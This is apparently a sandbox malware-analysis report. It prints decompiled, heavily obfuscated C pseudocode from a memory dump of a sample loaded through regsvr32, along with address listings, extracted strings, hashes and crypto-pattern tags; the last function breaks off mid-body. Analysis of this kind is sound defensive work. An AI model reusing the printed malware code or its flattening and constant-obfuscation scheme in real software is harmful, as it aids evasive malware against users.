				_t321 = 0x64;
				_v636 =  *_t132 * 0x60;
				_v636 = _v636 + 0xd33d;
				_v636 = _v636 << 5;
				_v636 = _v636 ^ 0x1e1aa121;
				_v640 = 0xb10dcc;
				_v640 = _v640 | 0xc382035c;
				_v640 = _v640 << 7;
				_v640 = _v640 | 0x409aa621;
				_v640 = _v640 ^ 0xd99a11e4;
				_v584 = 0xf23298;
				_v584 = _v584 / _t321;
				_v584 = _v584 << 0xa;
				_v584 = _v584 ^ 0x09bffa87;
				_v620 = 0xffd84f;
				_v620 = _v620 + 0x561c;
				_v620 = _v620 + 0x86f;
				_v620 = _v620 ^ 0xc18b30ac;
				_v620 = _v620 ^ 0xc08b73c8;
				_v628 = 0x373ddb;
				_v628 = _v628 | 0x384c5e9f;
				_v628 = _v628 >> 0xc;
				_v628 = _v628 + 0xc32f;
				_v628 = _v628 ^ 0x000038bb;
				_v604 = 0xfde248;
				_v604 = _v604 + 0xffff394c;
				_t322 = 0x71;
				_v604 = _v604 * 0xa;
				_v604 = _v604 ^ 0x90dc5ac9;
				_v604 = _v604 ^ 0x99310c60;
				_v576 = 0xeb2acc;
				_v576 = _v576 / _t322;
				_v576 = _v576 >> 0xf;
				_v576 = _v576 ^ 0x000b47a1;
				_v612 = 0xe0e237;
				_t199 =  &_v612; // 0xe0e237
				_t323 = 0x22;
				_v612 =  *_t199 * 0x63;
				_v612 = _v612 << 0xf;
				_v612 = _v612 + 0xffff9396;
				_v612 = _v612 ^ 0xbdacf125;
				_v552 = 0xa3e3d4;
				_t324 = _v536;
				_v552 = _v552 / _t323;
				_v552 = _v552 ^ 0x00068221;
				goto L1;
				do {
					while(1) {
						L1:
						_t330 = _t289 - 0xa9836df;
						if(_t330 > 0) {
							break;
						}
						if(_t330 == 0) {
							E040D3046(_v616, _v632, _v588, _t324, _v608);
							_t327 =  &(_t327[3]);
							L12:
							_t289 = 0xc26911c;
							continue;
						}
						if(_t289 == 0x7276a71) {
							_v536 = _v580;
							goto L12;
						}
						if(_t289 == 0x85778ce) {
							E040E07F4();
							_t289 = 0x9029ee2;
							continue;
						}
						if(_t289 == 0x9029ee2) {
							E040F0DB1(_v584,  &_v520, __eflags, _v620, _t289, _v628);
							_t283 = E040DEFE1(_v576, _v612, _v552,  &_v520);
							_t294 =  *0x40f6214; // 0x0
							 *((intOrPtr*)(_t294 + 4)) = _t283;
							L23:
							return _t325;
						}
						if(_t289 != 0x9959e7d) {
							goto L20;
						}
						_t285 = E040EE8B6(_t289, _v572, _v592, _t289, _v564, _v540);
						_t324 = _t285;
						_t327 =  &(_t327[4]);
						if(_t285 == 0) {
							_t289 = 0x7276a71;
						} else {
							_t287 =  *0x40f6214; // 0x0
							 *((intOrPtr*)(_t287 + 0x20)) = 1;
							_t289 = 0xdb6aac8;
						}
					}
					__eflags = _t289 - 0xc26911c;
					if(_t289 == 0xc26911c) {
						_t311 =  *0x40f6214; // 0x0
						_t271 = E040D1A34(_v600, _t311 + 0x34, _t289, _t289, _v560, _v596, _v636, _t289, _v536, _v640);
						_t327 =  &(_t327[8]);
						_t289 = 0x85778ce;
						__eflags = _t271;
						_t272 = 1;
						_t325 =  ==  ? _t272 : _t325;
						goto L20;
					}
					__eflags = _t289 - 0xd8634eb;
					if(_t289 == 0xd8634eb) {
						_push(_t289);
						_push(_t289);
						_t277 = E040DC5D8(0x444);
						_t327 =  &(_t327[3]);
						 *0x40f6214 = _t277;
						_t289 = 0x9959e7d;
						goto L1;
					}
					__eflags = _t289 - 0xdb6aac8;
					if(__eflags != 0) {
						goto L20;
					}
					_t289 = 0xa9836df;
					_v536 = _v556;
					goto L1;
					L20:
					__eflags = _t289 - 0xdb6d293;
				} while (__eflags != 0);
				goto L23;
			}

0x040e4a66
0x040e4a6c
0x040e4a76
0x040e4a7e
0x040e4a86
0x040e4a88
0x040e4a8f
0x040e4a97
0x040e4aa6
0x040e4aab
0x040e4ab1
0x040e4ab9
0x040e4ac1
0x040e4ac6
0x040e4ac7
0x040e4acb
0x040e4ad3
0x040e4adb
0x040e4ae0
0x040e4ae8
0x040e4af0
0x040e4af8
0x040e4b00
0x040e4b08
0x040e4b10
0x040e4b18
0x040e4b20
0x040e4b28
0x040e4b30
0x040e4b38
0x040e4b40
0x040e4b48
0x040e4b4d
0x040e4b55
0x040e4b5d
0x040e4b65
0x040e4b6d
0x040e4b75
0x040e4b7d
0x040e4b85
0x040e4b8d
0x040e4b95
0x040e4b9d
0x040e4ba5
0x040e4bad
0x040e4bb2
0x040e4bbf
0x040e4bc3
0x040e4bcb
0x040e4bd3
0x040e4bd8
0x040e4bdc
0x040e4be1
0x040e4be9
0x040e4bf1
0x040e4bf6
0x040e4bfe
0x040e4c06
0x040e4c0e
0x040e4c13
0x040e4c21
0x040e4c25
0x040e4c2d
0x040e4c35
0x040e4c3a
0x040e4c42
0x040e4c4a
0x040e4c57
0x040e4c5b
0x040e4c65
0x040e4c7d
0x040e4c82
0x040e4c8c
0x040e4c91
0x040e4c97
0x040e4c9f
0x040e4ca7
0x040e4cac
0x040e4caf
0x040e4cb3
0x040e4cbb
0x040e4cc0
0x040e4cc8
0x040e4cd0
0x040e4cd8
0x040e4cdd
0x040e4ce5
0x040e4ced
0x040e4cfd
0x040e4d01
0x040e4d06
0x040e4d0e
0x040e4d16
0x040e4d1e
0x040e4d26
0x040e4d2e
0x040e4d36
0x040e4d3e
0x040e4d46
0x040e4d4b
0x040e4d53
0x040e4d5b
0x040e4d63
0x040e4d70
0x040e4d73
0x040e4d77
0x040e4d7f
0x040e4d87
0x040e4d97
0x040e4d9b
0x040e4da0
0x040e4da8
0x040e4db0
0x040e4db5
0x040e4db6
0x040e4dba
0x040e4dbf
0x040e4dc7
0x040e4dcf
0x040e4ddd
0x040e4de1
0x040e4de5
0x040e4de5
0x040e4ded
0x040e4ded
0x040e4ded
0x040e4ded
0x040e4def
0x00000000
0x00000000
0x040e4df5
0x040e4e83
0x040e4e88
0x040e4e6b
0x040e4e6b
0x00000000
0x040e4e6b
0x040e4dfd
0x040e4e67
0x00000000
0x040e4e67
0x040e4e05
0x040e4e57
0x040e4e5c
0x00000000
0x040e4e5c
0x040e4e0d
0x040e4f39
0x040e4f56
0x040e4f5b
0x040e4f64
0x040e4f68
0x040e4f73
0x040e4f73
0x040e4e19
0x00000000
0x00000000
0x040e4e30
0x040e4e35
0x040e4e37
0x040e4e3c
0x040e4e50
0x040e4e3e
0x040e4e3e
0x040e4e46
0x040e4e49
0x040e4e49
0x040e4e3c
0x040e4e8d
0x040e4e8f
0x040e4ef3
0x040e4f02
0x040e4f07
0x040e4f0a
0x040e4f0f
0x040e4f13
0x040e4f14
0x00000000
0x040e4f14
0x040e4e91
0x040e4e97
0x040e4ec0
0x040e4ec1
0x040e4ec7
0x040e4ecc
0x040e4ecf
0x040e4ed4
0x00000000
0x040e4ed4
0x040e4e99
0x040e4e9f
0x00000000
0x00000000
0x040e4ea5
0x040e4ea7
0x00000000
0x040e4f17
0x040e4f17
0x040e4f17
0x00000000

Strings

*-, xrefs: 040E4CA7
6&Y, xrefs: 040E4B40
&6!, xrefs: 040E4AC1
]MH[, xrefs: 040E4BF6
*d>, xrefs: 040E4C65
7, xrefs: 040E4DB0

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: *-$&6!$*d>$6&Y$7$]MH[
API String ID: 0-1885758756
Opcode ID: 58e9deb6e29a80ce2c7d543c9fca322e85381b76be887cf2e6dbb701262cae71
Instruction ID: d8d56625a5ddc54fe976d3c3b08716057807ee0e248ac1de7e79286ff5c02d39
Opcode Fuzzy Hash: 58e9deb6e29a80ce2c7d543c9fca322e85381b76be887cf2e6dbb701262cae71
Instruction Fuzzy Hash: B3D130B15083809FD368CF65C58981BFBE1FBC4758F208A1DF2969A260D3B5D999CF42

Uniqueness

Uniqueness Score: -1.00%

Function 040ECCD9, Relevance: 7.7, Strings: 6, Instructions: 227
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E040ECCD9(void* __ecx, void* __edx) {
				signed int _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				void* _t242;
				intOrPtr _t243;
				intOrPtr _t244;
				void* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t252;
				signed int _t253;
				signed int _t254;
				void* _t282;
				void* _t283;
				signed int _t285;
				signed int* _t287;
				signed int* _t288;

				_t287 =  &_v100;
				_v4 = _v4 & 0x00000000;
				_v8 = 0x71e8b0;
				_v36 = 0x18cf5b;
				_v36 = _v36 + 0x6698;
				_v36 = _v36 ^ 0x001a117a;
				_v60 = 0xa2890;
				_t282 = __edx;
				_t248 = __ecx;
				_t283 = 0x72ed85;
				_t250 = 0x42;
				_v60 = _v60 / _t250;
				_v60 = _v60 ^ 0xe73bacde;
				_v60 = _v60 ^ 0xe73fbe74;
				_v40 = 0x9c8291;
				_t251 = 0x70;
				_v40 = _v40 / _t251;
				_v40 = _v40 ^ 0x000cc374;
				_v64 = 0xa8df6e;
				_t252 = 0x66;
				_v64 = _v64 * 0x5a;
				_v64 = _v64 | 0x6df616d5;
				_v64 = _v64 ^ 0x7ff9e958;
				_v88 = 0xc174cb;
				_v88 = _v88 ^ 0xe7b64a13;
				_v88 = _v88 ^ 0xc84137a7;
				_v88 = _v88 << 0xc;
				_v88 = _v88 ^ 0x60915aca;
				_v32 = 0x752193;
				_v32 = _v32 * 0x3f;
				_v32 = _v32 ^ 0x1cda7702;
				_v92 = 0x141833;
				_v92 = _v92 + 0xffffc8f8;
				_v92 = _v92 + 0xf362;
				_v92 = _v92 << 0x10;
				_v92 = _v92 ^ 0xd48431d2;
				_v96 = 0xc34044;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffff536d;
				_v96 = _v96 + 0x5d23;
				_v96 = _v96 ^ 0xc334c852;
				_v20 = 0x3a6348;
				_v20 = _v20 << 0x10;
				_v20 = _v20 ^ 0x6343ca6d;
				_v56 = 0x49cd71;
				_v56 = _v56 ^ 0x72d9145f;
				_v56 = _v56 + 0x4f98;
				_v56 = _v56 ^ 0x7290366b;
				_v24 = 0x3bf83a;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x77f6a760;
				_v28 = 0x632842;
				_v28 = _v28 + 0xffffe69b;
				_v28 = _v28 ^ 0x006ee443;
				_v48 = 0x4b2ed5;
				_v48 = _v48 ^ 0x82c7a85b;
				_v48 = _v48 + 0xffff7c4b;
				_v48 = _v48 ^ 0x8282f052;
				_v52 = 0x4c7b52;
				_v52 = _v52 + 0xffffbc1f;
				_v52 = _v52 + 0x2e12;
				_v52 = _v52 ^ 0x004752b1;
				_v16 = 0x3a13fc;
				_v16 = _v16 / _t252;
				_v16 = _v16 ^ 0x00081e0d;
				_v84 = 0x8573c6;
				_t253 = 0x4b;
				_v84 = _v84 / _t253;
				_v84 = _v84 | 0x42242f90;
				_v84 = _v84 >> 0xc;
				_v84 = _v84 ^ 0x00008b33;
				_v100 = 0x3509ce;
				_t254 = 0x19;
				_v100 = _v100 / _t254;
				_t285 = 0x44;
				_t255 = 0x6f;
				_v100 = _v100 * 0x31;
				_v100 = _v100 + 0x6b64;
				_v100 = _v100 ^ 0x006714bf;
				_v68 = 0x65eeb7;
				_v68 = _v68 + 0x24bd;
				_v68 = _v68 << 7;
				_v68 = _v68 ^ 0x330bb4b3;
				_v72 = 0x31388d;
				_v72 = _v72 * 0x77;
				_v72 = _v72 / _t285;
				_v72 = _v72 ^ 0x00560572;
				_v76 = 0x10ecc2;
				_v76 = _v76 | 0x28471304;
				_v76 = _v76 + 0xcdda;
				_v76 = _v76 ^ 0x285661a5;
				_v44 = 0xf32c83;
				_v44 = _v44 / _t255;
				_v44 = _v44 / _t285;
				_v44 = _v44 ^ 0x000ff213;
				_v80 = 0xb9f4a0;
				_v80 = _v80 << 0xa;
				_v80 = _v80 + 0xd38f;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00ede5ae;
				_v12 = 0x138f30;
				_v12 = _v12 ^ 0xf49e1969;
				_v12 = _v12 ^ 0xf48aec3a;
				while(1) {
					L1:
					_t242 = 0xd8fe181;
					do {
						L2:
						while(_t283 != 0x72ed85) {
							if(_t283 == 0xb6c7232) {
								_t278 = _v52;
								_t255 = _v48;
								_t243 = E040F1005(_v48, _v52, _v16, _v84,  *((intOrPtr*)(_t282 + 0x38)));
								_t287 =  &(_t287[3]);
								 *((intOrPtr*)(_t282 + 0x2c)) = _t243;
								__eflags = _t243;
								_t242 = 0xd8fe181;
								_t283 =  !=  ? 0xd8fe181 : 0xd6f812a;
								continue;
							}
							if(_t283 == 0xc5020c9) {
								_push(_v64);
								_t244 = E040F3263(_v36, _v60, __eflags, _t248, _v40, _t255);
								_t288 =  &(_t287[4]);
								 *((intOrPtr*)(_t282 + 0x38)) = _t244;
								__eflags = _t244;
								if(_t244 != 0) {
									E040F148A(_t244, _t244, _v88, _v32, _v92, _v96);
									_t278 = _v56;
									_t255 = _v20;
									E040DE2BD(_v56, _v24,  *((intOrPtr*)(_t282 + 0x38)), _v28);
									_t287 =  &(_t288[7]);
									_t283 = 0xb6c7232;
									goto L1;
								}
							} else {
								if(_t283 == 0xd6f812a) {
									return E040DF0E9(_v44,  *((intOrPtr*)(_t282 + 0x38)), _v80, _v12);
								}
								if(_t283 != _t242) {
									goto L13;
								} else {
									_t244 = E040E0EBC(_v100, _t278, _v68, _v100, _v72, _v76, _v100, _t255, _t282, E040F25F1);
									_t287 =  &(_t287[8]);
									 *((intOrPtr*)(_t282 + 0x48)) = _t244;
									if(_t244 == 0) {
										_t283 = 0xd6f812a;
										while(1) {
											L1:
											_t242 = 0xd8fe181;
											goto L2;
										}
									}
								}
							}
							return _t244;
						}
						_t283 = 0xc5020c9;
						L13:
						__eflags = _t283 - 0x11d9bb5;
					} while (__eflags != 0);
					return _t242;
				}
			}

0x040eccd9
0x040eccdc
0x040ecce1
0x040ecce9
0x040eccf1
0x040eccf9
0x040ecd01
0x040ecd11
0x040ecd13
0x040ecd19
0x040ecd1e
0x040ecd23
0x040ecd29
0x040ecd31
0x040ecd39
0x040ecd45
0x040ecd4a
0x040ecd50
0x040ecd58
0x040ecd65
0x040ecd66
0x040ecd6a
0x040ecd72
0x040ecd7a
0x040ecd82
0x040ecd8a
0x040ecd92
0x040ecd97
0x040ecd9f
0x040ecdac
0x040ecdb0
0x040ecdb8
0x040ecdc0
0x040ecdc8
0x040ecdd0
0x040ecdd5
0x040ecddd
0x040ecde5
0x040ecdea
0x040ecdf2
0x040ecdfa
0x040ece02
0x040ece0a
0x040ece0f
0x040ece17
0x040ece1f
0x040ece27
0x040ece2f
0x040ece37
0x040ece3f
0x040ece44
0x040ece4c
0x040ece54
0x040ece5c
0x040ece64
0x040ece6c
0x040ece74
0x040ece7c
0x040ece84
0x040ece8c
0x040ece94
0x040ece9c
0x040ecea4
0x040eceb2
0x040eceb6
0x040ecec0
0x040ecece
0x040eced3
0x040eced7
0x040ecedf
0x040ecee4
0x040eceec
0x040ecefa
0x040eceff
0x040ecf0a
0x040ecf0d
0x040ecf0e
0x040ecf12
0x040ecf1a
0x040ecf22
0x040ecf2a
0x040ecf32
0x040ecf37
0x040ecf3f
0x040ecf4c
0x040ecf58
0x040ecf5c
0x040ecf64
0x040ecf6c
0x040ecf74
0x040ecf7c
0x040ecf84
0x040ecf94
0x040ecfa3
0x040ecfa7
0x040ecfaf
0x040ecfb7
0x040ecfbc
0x040ecfc4
0x040ecfc9
0x040ecfd1
0x040ecfd9
0x040ecfe1
0x040ecfe9
0x040ecfe9
0x040ecfe9
0x040ecfee
0x00000000
0x040ecfee
0x040ed000
0x040ed0bc
0x040ed0c0
0x040ed0c4
0x040ed0c9
0x040ed0cc
0x040ed0cf
0x040ed0d3
0x040ed0d8
0x00000000
0x040ed0d8
0x040ed00c
0x040ed04e
0x040ed060
0x040ed065
0x040ed068
0x040ed06b
0x040ed06d
0x040ed087
0x040ed097
0x040ed09b
0x040ed09f
0x040ed0a4
0x040ed0a7
0x00000000
0x040ed0a7
0x040ed00e
0x040ed010
0x00000000
0x040ed108
0x040ed018
0x00000000
0x040ed01e
0x040ed037
0x040ed03c
0x040ed03f
0x040ed044
0x040ed04a
0x040ecfe9
0x040ecfe9
0x040ecfe9
0x00000000
0x040ecfe9
0x040ecfe9
0x040ed044
0x040ed018
0x040ed110
0x040ed110
0x040ed0e0
0x040ed0e5
0x040ed0e5
0x040ed0e5
0x00000000
0x040ecfee

Strings

#], xrefs: 040ECDF2
Hc:, xrefs: 040ECE02
$P, xrefs: 040ECD0F, 040ED023
R{L, xrefs: 040ECE84
Cn, xrefs: 040ECE5C
dk, xrefs: 040ECF12

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: #]$$P$Cn$Hc:$R{L$dk
API String ID: 0-1551317889
Opcode ID: e7a12d6996334f7a43c6909c119a08997bf01750e299bf123148e5cfa4435380
Instruction ID: 999909699de5a846e386ad142a65482cdffcbca3598322e747e6236e7186794e
Opcode Fuzzy Hash: e7a12d6996334f7a43c6909c119a08997bf01750e299bf123148e5cfa4435380
Instruction Fuzzy Hash: AEB142B25083419FD358CF26C54941BFBE2FBC4758F008A2DF699A6260D3B6D959CF82

Uniqueness

Uniqueness Score: -1.00%

Function 040DF369, Relevance: 7.7, Strings: 6, Instructions: 211
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E040DF369(void* __ecx) {
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				unsigned int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t207;
				void* _t210;
				void* _t213;
				void* _t214;
				void* _t216;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				signed int _t237;
				signed int _t238;
				signed int _t239;
				void* _t241;
				signed int* _t243;
				void* _t246;

				_t243 =  &_v88;
				_v16 = 0x3949c2;
				asm("stosd");
				_t214 = __ecx;
				_t241 = 0;
				_t216 = 0x68b8c0f;
				asm("stosd");
				asm("stosd");
				_v76 = 0x201aab;
				_t234 = 0x76;
				_v76 = _v76 / _t234;
				_v76 = _v76 + 0xe408;
				_t235 = 0xc;
				_v76 = _v76 * 0x38;
				_v76 = _v76 ^ 0x004fdd99;
				_v44 = 0xd502f1;
				_v44 = _v44 | 0x910f8184;
				_v44 = _v44 / _t235;
				_v44 = _v44 ^ 0x0c2ba140;
				_v48 = 0xe41bd4;
				_v48 = _v48 ^ 0x89eac382;
				_t236 = 0x67;
				_v48 = _v48 / _t236;
				_v48 = _v48 ^ 0x015e526e;
				_v24 = 0xf49d06;
				_v24 = _v24 | 0x486b4754;
				_v24 = _v24 ^ 0x48f37dd9;
				_v88 = 0xd25a8e;
				_v88 = _v88 ^ 0x0de03e2c;
				_v88 = _v88 >> 8;
				_t237 = 0x57;
				_v88 = _v88 / _t237;
				_v88 = _v88 ^ 0x00057327;
				_v32 = 0x480afd;
				_v32 = _v32 ^ 0x00453f61;
				_v60 = 0x165baf;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0xd8cf9c31;
				_v60 = _v60 ^ 0x81a5172b;
				_v84 = 0x2fcd58;
				_v84 = _v84 + 0x335f;
				_v84 = _v84 + 0xffff6358;
				_v84 = _v84 << 9;
				_v84 = _v84 ^ 0x5ec42bb0;
				_v40 = 0xbc2783;
				_v40 = _v40 + 0xffff2ae1;
				_t238 = 0xa;
				_v40 = _v40 * 0x5e;
				_v40 = _v40 ^ 0x44c8bdaa;
				_v72 = 0xc9404f;
				_v72 = _v72 | 0xfaaf7fa5;
				_v72 = _v72 / _t238;
				_v72 = _v72 >> 0xc;
				_v72 = _v72 ^ 0x000be8dc;
				_v56 = 0xcb8585;
				_v56 = _v56 >> 6;
				_v56 = _v56 ^ 0xa4d175a3;
				_v56 = _v56 ^ 0xa4d4e9a5;
				_v28 = 0xfbd7ad;
				_v28 = _v28 + 0xffffc7a7;
				_v28 = _v28 ^ 0x00f429b0;
				_v80 = 0x6cf7c4;
				_v80 = _v80 << 0xb;
				_v80 = _v80 ^ 0xc9851cf7;
				_v80 = _v80 + 0xe116;
				_v80 = _v80 ^ 0xae3f2149;
				_v52 = 0xd995b1;
				_v52 = _v52 + 0x112b;
				_v52 = _v52 + 0xffff70e0;
				_v52 = _v52 ^ 0x00d4086e;
				_v64 = 0x3e6f55;
				_v64 = _v64 ^ 0x64233eb3;
				_v64 = _v64 + 0xfffff8c9;
				_v64 = _v64 + 0xffffb5e5;
				_v64 = _v64 ^ 0x64179829;
				_v68 = 0x30eb6c;
				_t239 = 0x37;
				_v68 = _v68 / _t239;
				_v68 = _v68 + 0xffffeee1;
				_v68 = _v68 >> 0xa;
				_v68 = _v68 ^ 0x000816d3;
				_v20 = 0x71a516;
				_v20 = _v20 | 0x2f4429e5;
				_v20 = _v20 ^ 0x2f784372;
				_v36 = 0xda1832;
				_v36 = _v36 * 0x4c;
				_v36 = _v36 + 0xffff5a89;
				_v36 = _v36 ^ 0x40b976b8;
				goto L1;
				do {
					while(1) {
						L1:
						_t246 = _t216 - 0x68b8c0f;
						if(_t246 > 0) {
							break;
						}
						if(_t246 == 0) {
							_t216 = 0xe6264d6;
							continue;
						} else {
							if(_t216 == 0x8a1c17) {
								_push(_t216);
								_t202 = E040E07F0();
								_t243 =  &(_t243[1]);
								_t216 = 0xf218af8;
								_t241 = _t241 + _t202;
								continue;
							} else {
								if(_t216 == 0x50fe579) {
									_t241 = _t241 + E040EBE8C(_t214 + 0x2c, _v64, _v68, _v20, _v36);
								} else {
									if(_t216 == 0x530d654) {
										_push(_t216);
										_t207 = E040E07F0();
										_t243 =  &(_t243[1]);
										_t216 = 0x8a5806a;
										_t241 = _t241 + _t207;
										continue;
									} else {
										if(_t216 != 0x5e83455) {
											goto L17;
										} else {
											_push(_t216);
											_t210 = E040E07F0();
											_t243 =  &(_t243[1]);
											_t216 = 0x530d654;
											_t241 = _t241 + _t210;
											continue;
										}
									}
								}
							}
						}
						L20:
						return _t241;
					}
					if(_t216 == 0x8a5806a) {
						_push(_t216);
						_t198 = E040E07F0();
						_t243 =  &(_t243[1]);
						_t216 = 0x8a1c17;
						_t241 = _t241 + _t198;
						goto L17;
					} else {
						if(_t216 == 0xe6264d6) {
							_t199 = E040EBE8C(_t214 + 0x4c, _v76, _v44, _v48, _v24);
							_t243 =  &(_t243[3]);
							_t216 = 0x5e83455;
							_t241 = _t241 + _t199;
							goto L1;
						} else {
							if(_t216 != 0xf218af8) {
								goto L17;
							} else {
								_push(_t216);
								_t213 = E040E07F0();
								_t243 =  &(_t243[1]);
								_t216 = 0x50fe579;
								_t241 = _t241 + _t213;
								goto L1;
							}
						}
					}
					goto L20;
					L17:
				} while (_t216 != 0x3fc4e73);
				goto L20;
			}

0x040df369
0x040df36c
0x040df380
0x040df388
0x040df38a
0x040df38c
0x040df38e
0x040df38f
0x040df390
0x040df39c
0x040df3a1
0x040df3a7
0x040df3b4
0x040df3b7
0x040df3bb
0x040df3c3
0x040df3cb
0x040df3db
0x040df3df
0x040df3e7
0x040df3ef
0x040df3fb
0x040df400
0x040df406
0x040df40e
0x040df416
0x040df41e
0x040df426
0x040df42e
0x040df436
0x040df43f
0x040df444
0x040df44a
0x040df452
0x040df462
0x040df46a
0x040df472
0x040df477
0x040df47f
0x040df487
0x040df48f
0x040df497
0x040df49f
0x040df4a4
0x040df4ac
0x040df4b4
0x040df4c1
0x040df4c2
0x040df4c6
0x040df4ce
0x040df4d6
0x040df4e4
0x040df4ea
0x040df4ef
0x040df4f7
0x040df4ff
0x040df504
0x040df50c
0x040df514
0x040df51c
0x040df524
0x040df52c
0x040df534
0x040df539
0x040df541
0x040df549
0x040df551
0x040df559
0x040df561
0x040df569
0x040df571
0x040df579
0x040df581
0x040df589
0x040df591
0x040df599
0x040df5a7
0x040df5af
0x040df5b3
0x040df5bb
0x040df5c0
0x040df5c8
0x040df5d0
0x040df5d8
0x040df5e0
0x040df5ed
0x040df5f1
0x040df5f9
0x040df5f9
0x040df601
0x040df601
0x040df601
0x040df601
0x040df603
0x00000000
0x00000000
0x040df605
0x040df67d
0x00000000
0x040df607
0x040df60d
0x040df66b
0x040df66c
0x040df671
0x040df674
0x040df679
0x00000000
0x040df60f
0x040df615
0x040df71a
0x040df61b
0x040df621
0x040df651
0x040df652
0x040df657
0x040df65a
0x040df65f
0x00000000
0x040df623
0x040df629
0x00000000
0x040df62f
0x040df637
0x040df638
0x040df63d
0x040df640
0x040df645
0x00000000
0x040df645
0x040df629
0x040df621
0x040df615
0x040df60d
0x040df71d
0x040df725
0x040df725
0x040df687
0x040df6e1
0x040df6e2
0x040df6e7
0x040df6ea
0x040df6ef
0x00000000
0x040df689
0x040df68b
0x040df6c5
0x040df6ca
0x040df6cd
0x040df6d2
0x00000000
0x040df68d
0x040df693
0x00000000
0x040df695
0x040df69d
0x040df69e
0x040df6a3
0x040df6a6
0x040df6ab
0x00000000
0x040df6ab
0x040df693
0x040df68b
0x00000000
0x040df6f1
0x040df6f1
0x00000000

Strings

a?E, xrefs: 040DF462
rCx/, xrefs: 040DF5D8
_3, xrefs: 040DF48F
l0, xrefs: 040DF599
,>, xrefs: 040DF42E
Uo>, xrefs: 040DF571

Memory Dump Source

Source File: 00000003.00000002.247650152.00000000040D1000.00000020.00000001.sdmp, Offset: 040D0000, based on PE: true

Associated: 00000003.00000002.247645014.00000000040D0000.00000004.00000001.sdmp Download File
Associated: 00000003.00000002.247693534.00000000040F6000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_40d0000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,>$Uo>$_3$a?E$l0$rCx/
API String ID: 0-1805074986
Opcode ID: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction ID: bc4d6eac2b619e611928afc6770c3b81b98fac0a3644e87ba5465ce283933374
Opcode Fuzzy Hash: aee53d98fdbd87342a85eaa3d07f56d671f8fcd94221aca7db3dcd7928f6070b
Instruction Fuzzy Hash: 499167B1A083419FD398CF25D88541FBBF1FBD8748F144A2DF686A6260D3B6D9188B43

Uniqueness

Uniqueness Score: -1.00%

Function 040E8806, Relevance: 7.7, Strings: 6, Instructions: 201
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E040E8806(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t156;
				void* _t172;
				void* _t174;
				void* _t177;
				void* _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				void* _t189;
				intOrPtr _t216;
				signed int* _t219;

				_t215 = _a8;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E040EFE29(_t156);
				_v76 = 0x923182;
				_t219 =  &(( &_v140)[4]);
				_v72 = 0xa31cb9;
				_t216 = 0;
				_v68 = 0;
				_v64 = 0;
				_t189 = 0xe0c62fa;
				_v120 = 0x4473bb;
				_t183 = 0x46;
				_v120 = _v120 / _t183;
				_v120 = _v120 << 6;
				_v120 = _v120 ^ 0x003879f9;
				_v100 = 0x40bbdb;
				_t184 = 0x64;
				_v100 = _v100 * 0x13;
				_v100 = _v100 ^ 0x04c6e1a5;
				_v140 = 0x8d0a20;
				_v140 = _v140 * 0x6a;
				_v140 = _v140 + 0x25b5;
				_v140 = _v140 * 0x47;
				_v140 = _v140 ^ 0x32607187;
				_v84 = 0x381a9b;
				_v84 = _v84 + 0xbdad;
				_v84 = _v84 ^ 0x00352eaa;
				_v124 = 0x2aec69;
				_v124 = _v124 | 0x10e7a47b;
				_v124 = _v124 ^ 0x113e433b;
				_v124 = _v124 / _t184;
				_v124 = _v124 ^ 0x000f1a56;
				_v80 = 0x7d6845;
				_v80 = _v80 + 0xffff13df;
				_v80 = _v80 ^ 0x0079135d;
				_v92 = 0x295f3e;
				_v92 = _v92 + 0xbf8d;
				_v92 = _v92 ^ 0x0026878e;
				_v116 = 0x37f4f;
				_v116 = _v116 << 6;
				_v116 = _v116 + 0x3a5c;
